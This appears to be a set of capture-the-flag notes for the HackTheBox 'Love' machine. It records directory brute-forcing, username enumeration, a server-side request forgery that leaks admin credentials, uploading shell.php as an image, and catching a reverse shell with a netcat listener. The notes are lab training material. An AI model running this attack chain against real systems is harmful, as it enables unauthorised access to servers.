2 :80
$ gobuster dir -u http://love.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 50
===============================================================
/index.php (Status: 200) [Size: 4388]
/images (Status: 301) [Size: 330] [--> http://love.htb/images/]
/admin (Status: 301) [Size: 329] [--> http://love.htb/admin/]
/plugins (Status: 301) [Size: 331] [--> http://love.htb/plugins/]
/includes (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/preview.php (Status: 302) [Size: 0] [--> index.php]
/dist (Status: 301) [Size: 328] [--> http://love.htb/dist/]
/licenses (Status: 403) [Size: 417]
/Plugins (Status: 301) [Size: 331] [--> http://love.htb/Plugins/]
/phpmyadmin (Status: 403) [Size: 298]
/webalizer (Status: 403) [Size: 298]
/Logout.php (Status: 302) [Size: 0] [--> index.php]
http://love.htb/admin/index.php
allows username enumeration
Username admin is valid.
https://love.htb
Forbidden
You don't have permission to access this resource
http://staging.love.htb/beta.php
Specify the file url: localhost:5000
Voting system Administration
Vote Admin Creds admin: @LoveIsInTheAir!!!!
http://love.htb/admin
Successful login
Create a new Voter
Upload shell.php in place of image
and Save.
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.119] from (UNKNOWN) [10.129.105.29] 52571
SOCKET: Shell has connected! PID: 5696
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
whoami
love\phoebe
Last updated